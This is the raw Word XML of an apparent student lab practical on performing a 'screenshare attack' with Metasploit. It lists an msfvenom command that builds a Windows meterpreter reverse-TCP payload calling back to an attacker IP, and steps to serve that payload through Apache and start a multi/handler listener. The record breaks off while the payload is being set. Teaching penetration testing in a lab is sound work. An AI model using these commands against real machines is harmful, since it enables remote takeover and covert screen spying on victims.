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72296" w:rsidR="00542B5E" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CE9" w14:textId="7777777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2296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Practical No.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CEA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="157"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t>To perform screenshare attack using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CEB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CEC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CED" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Linux terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CEE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t xml:space="preserve">  Right click and open Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CEF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D52" wp14:editId="4ADC8D53">
            <wp:extent cx="4449565" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="19493358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550" cy="2707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72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00534361" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="00BE6EAA">
        <w:t>Find the our system</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00BE6EAA">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00534361">
        <w:t xml:space="preserve"> IP address using </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00534361">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00534361">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CF2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D54" wp14:editId="04313706">
            <wp:extent cx="5731510" cy="3221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72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00304CEC" w:rsidRDefault="00534361" w14:paraId="4ADC8CF5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00304CEC" w:rsidRDefault="00534361" w14:paraId="4ADC8CF6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CF9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00AA1011" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CFA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t xml:space="preserve">  Type sudo su abd enter the password : </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">kali </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t>(by default kali linux has password as kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CFB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8CFC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D56" wp14:editId="3E55FF55">
            <wp:extent cx="5731510" cy="32219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72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CFD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00AA1011" w:rsidP="00304CEC" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CFE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00534361" w:rsidRDefault="00AA1011" w14:paraId="4ADC8CFF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00534361">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> To </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00534361">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>create the malicious payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00534361">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> that will connect back to the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00534361" w:rsidRDefault="00534361" w14:paraId="4ADC8D00" w14:textId="6CFC76DD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Run command :</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.128 LPORT=123 -f exe -o </w:t>
      </w:r>
      <w:r w:rsidR="002D07F0">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00534361" w:rsidRDefault="00534361" w14:paraId="4ADC8D01" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00534361" w:rsidRDefault="00534361" w14:paraId="4ADC8D02" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Make sure LHOST is your Ip address from Step 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00534361" w:rsidRDefault="00534361" w14:paraId="4ADC8D03" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00534361" w:rsidP="00534361" w:rsidRDefault="00534361" w14:paraId="4ADC8D04" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="003306F9" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D05" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D58" wp14:editId="3F125BBC">
            <wp:extent cx="5731510" cy="32219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72296" w:rsidR="003306F9" w:rsidP="00534361" w:rsidRDefault="003306F9" w14:paraId="4ADC8D06" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DF347C" w14:paraId="4ADC8D07" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00DD0571">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">6:-Type ls for checking that payload is exist or not </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D08" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Move the generated payload to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296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/var/www/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D0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E72296">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>mv payload.exe /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DD0571" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D0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E72296">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296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Start Apache Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D0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E72296">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DD0571" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D0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:rsidRPr="00E72296" w:rsidR="003306F9" w:rsidP="00534361" w:rsidRDefault="003306F9" w14:paraId="4ADC8D0D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D0E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="003306F9" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D0F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D5A" wp14:editId="23DBB743">
            <wp:extent cx="5731510" cy="32219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72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D10" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D11" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7:- Open New Tab In The Terminal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D12" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t xml:space="preserve"> Start Metasploit Framework using </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D13" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296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Command:-sudo msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="003306F9" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D14" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D5C" wp14:editId="4ADC8D5D">
            <wp:extent cx="4456209" cy="2505075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961" cy="250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72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D15" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D16" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D17" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D18" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00E72296" w:rsidP="00E72296" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D1A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Step 8:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:t xml:space="preserve">  Use the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00E72296">
        <w:t xml:space="preserve"> module</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00E72296">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="002D5907" w:rsidP="002D5907" w:rsidRDefault="002D5907" w14:paraId="4ADC8D1B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:t xml:space="preserve">Set the payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00E72296">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00E72296">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
